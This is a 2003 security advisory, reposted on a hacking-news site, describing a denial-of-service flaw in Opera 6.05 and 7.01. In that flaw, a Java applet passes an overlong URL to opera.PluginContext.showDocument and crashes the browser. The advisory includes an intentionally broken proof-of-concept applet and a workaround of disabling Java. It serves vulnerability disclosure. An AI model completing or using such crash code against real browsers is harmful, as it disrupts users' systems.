Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Java-Applet crashes Opera 6.05 and 7.01

Java-Applet crashes Opera 6.05 and 7.01

by Nikola Strahija on February 11th, 2003 Analyzing the public interfaces of the opera java class libraries, a special applet could be constructed that provokes a JNI call with an invalid parameter right into a vulnerable routine causing a Denial of Service.


Applet crashes Opera 6.05 and 7.01
===================================================
Vendor: Opera
Versions affected: Opera 6.05 / 7.01
Date: 3rd February 2003
Type of Vulnerability: Client DoS
Severity: High
Discovered by: Marc Schoenefeld, [email protected]
Online location: http://www.illegalaccess.org/java/OperaCall2.html
===================================================

Analyzing the public interfaces of the opera java class libraries, a special
applet could be constructed that provokes a JNI call with an invalid
parameter right into a vulnerable routine causing a Denial of Service!

Discovery date
3 Feb 2003.

Affected applications
Opera 6.05
Opera 7.01
Vendor Response
This is what is rather unnice, the Opera team does not respond to bug
reports, and neither read their own forum entries, to which the bug was also
posted

Solution
Until a patch becomes available, disable Java by going to: File ->
Preferences -> Multimedia, and uncheck the "Enable Java" item.

Analysis
Opera has its own class files in the opera.jar library. These are considered
trusted by the system policies. But they are also vulnerable against invalid
user input. In the proof-of-concept shown below the following showDocument
method of the PluginContext object is called with a URL object carrying a
very long string. Executing this method, causes the call of a native method,
which cannot handle the value and therefore raises a JVM crash, which then
crashes Opera 7.01. This was observed on Windows XP and Opera 6.05/7.01 with
Java enabled, directly calling the applet after installation.


//Marc Schoenefeld 1/13/2003, www.illegalaccess.org
//not runnable, a little crippled, there are couple of obvious syntax errors
to avoid script-kidding

...
import opera.PluginContext; // !! import the vulnerable class
...

public class OperaCall2 extends App1et
{
- -
- - public OperaCall2()
- - {
- - }
- -
- - public void paint(Graphics g)
- - {
- - PluginContext plugincontext = new PluginContext(l);
- - try
- - {
- - plugincontext.showDocument(new URL("http://xxx.xxx"; + new
String(new byte[30000])));
- - }
- - catch(Exception exception)
- - {
- - exception.printStackTrace();
- - }
- - }
}


Disclaimer
The information in this advisory and any of its demonstrations is provided
"as is" without warranty of any kind. Beauchamp Security is not liable for
any direct or indirect damages caused as a result of using the information
or demonstrations provided in any part of this advisory.


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »